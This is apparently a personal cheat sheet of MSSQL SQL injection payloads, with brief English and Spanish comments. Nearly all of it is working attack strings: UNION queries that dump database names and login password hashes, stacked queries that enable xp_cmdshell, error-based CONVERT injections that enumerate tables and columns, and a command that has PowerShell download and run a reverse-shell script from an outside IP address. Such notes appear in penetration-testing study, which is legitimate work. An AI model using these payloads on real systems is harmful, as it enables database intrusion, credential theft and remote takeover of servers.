' UNION SELECT name,NULL FROM master ..sysdatabases--
' UNION SELECT name, password_hash FROM master.sys.sql_logins--
##Sometimes casting is needed
master.dbo.fn_varbintohexstr(password_hash)
Enable xp_cmdshell if user is 'sa'
';EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--
';EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
Execute commands (date cuenta de escapar las comillas)
'EXEC master.dbo.xp_cmdshell 'powershell "IEX(New-Object Net.WebClient).downloadString(\\"<http://192.168.119.122/Utilities/Revshells/shell.ps1\\")">';--
https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/
',convert(int,db_name())--
Enumerate dbs's
Enumerate db tables
',CONVERT(INT,(SELECT top 1 TABLE_NAME FROM archive.information_schema.TABLES)))—
Enumerate first column from table
',CONVERT(INT,(SELECT top 1 column_name FROM archive.information_schema.COLUMNS WHERE TABLE_NAME=''vulnerable')))—
Retrieved id, lets enumerate more
',CONVERT(INT,(SELECT top 1 column_name FROM archive.information_schema.COLUMNS WHERE TABLE_NAME='vulnerable' AND column_name NOT IN ('id'))))--